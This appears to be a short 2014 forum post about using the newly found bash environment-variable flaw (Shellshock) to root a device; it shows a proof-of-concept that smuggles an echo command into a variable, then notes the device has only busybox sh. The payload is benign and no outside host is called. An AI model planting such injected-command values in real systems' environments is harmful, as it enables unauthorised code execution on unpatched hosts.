Page 1 of 1

Rooting idea

Posted: Thu Sep 25, 2014 8:27 pm
by bolvan
Recently vulnerability was found in bash.

Code: Select all

k@wifi:~$ export x='() { :; }; echo "Oh..."'
k@wifi:~$ echo $x
() { :; }; echo "Oh..."
k@wifi:~$ bash
Oh...
To exploit it we need

1) set any env variable
2) trigger execution of bash with any parameters. I guess exedsp often call shell.

UPDATE. False hope. Bash is not present on the system, only sh from busybox.